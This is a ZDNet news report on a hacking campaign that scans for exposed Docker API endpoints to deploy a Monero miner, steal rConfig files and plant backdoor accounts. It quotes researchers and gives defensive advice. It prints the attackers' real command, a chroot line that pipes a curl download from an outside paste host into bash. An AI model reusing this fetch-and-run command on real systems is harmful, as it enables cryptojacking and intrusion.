X
Tech

A hacking group is hijacking Docker systems with exposed API endpoints

It's almost 2020 and some sysadmins are still leaving Docker admin ports exposed on the internet.
Written by Catalin Cimpanu, Contributor
Docker
Image: Docker, ZDNet

A hacking group is currently mass-scanning the internet looking for Docker platforms that have API endpoints exposed online.

The purpose of these scans is to allow the hacker group to send commands to the Docker instance and deploy a cryptocurrency miner on a company's Docker instances, to generate funds for the group's own profits.

A professional operation

This particular mass-scanning operation started over the weekend, on November 24, and immediately stood out due to its sheer size.

"Users of the Bad Packets CTI API will note that exploit activity targeting exposed Docker instances is nothing new and happens quite often," Troy Mursch, chief research officer and co-founder of Bad Packets LLC, told ZDNet today.

"What set this campaign apart was the large uptick of scanning activity. This alone warranted further investigation to find out what this botnet was up to," he said.

"As others have noted [1, 2], this isn't your average script kiddie exploit attempt," Mursch, who discovered the campaign, told us. "There was a moderate level of effort put into this campaign, and we haven't fully analyzed every single thing it does as of yet."

What we know so far

What we know so far is that the group behind these attacks is currently scanning more than 59,000 IP networks (netblocks) looking for exposed Docker instances.

Once the group identifies an exposed host, attackers use the API endpoint to start an Alpine Linux OS container where they run the following command:

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;

The above command downloads and runs a Bash script from the attackers' server. This script installs a classic XMRRig cryptocurrency miner. In the two days since this campaign has been active, hackers have already mined 14.82 Monero coins (XMR), worth just over $740, Mursch noted.

docker-campaign-xmrhunter.png

In addition, this malware operation also comes with a self-defense measure.

"One unoriginal but interesting function of the campaign is that it uninstalls known monitoring agents and kills a bunch of processes via a script downloaded from http://ix[.]io/1XQh," Mursch told us.

Looking through this script, we not only see that hackers are disabling security products, but they're shutting down lso processes associated with rival cryptocurrency-mining botnets, such as DDG.

In addition, Mursch also discovered a function of the malicious script that scans an infected host for rConfig configuration files, which it encrypts and steals, sending the files back to the group's command and control server.

Furthermore, Craig H. Rowland, founder of Sandfly Security, has also noticed that hackers are also creating backdoor accounts on the hacked containers, and leaving SSH keys behind for easier access, and a way to control all infected bots from a remote location.

For the time being, Mursch recommends that users and organizations who run Docker instances immediately check if they are exposing API endpoints on the internet, close the ports, and then terminate unrecognized running containers.

Data leaks: The most common sources

Editorial standards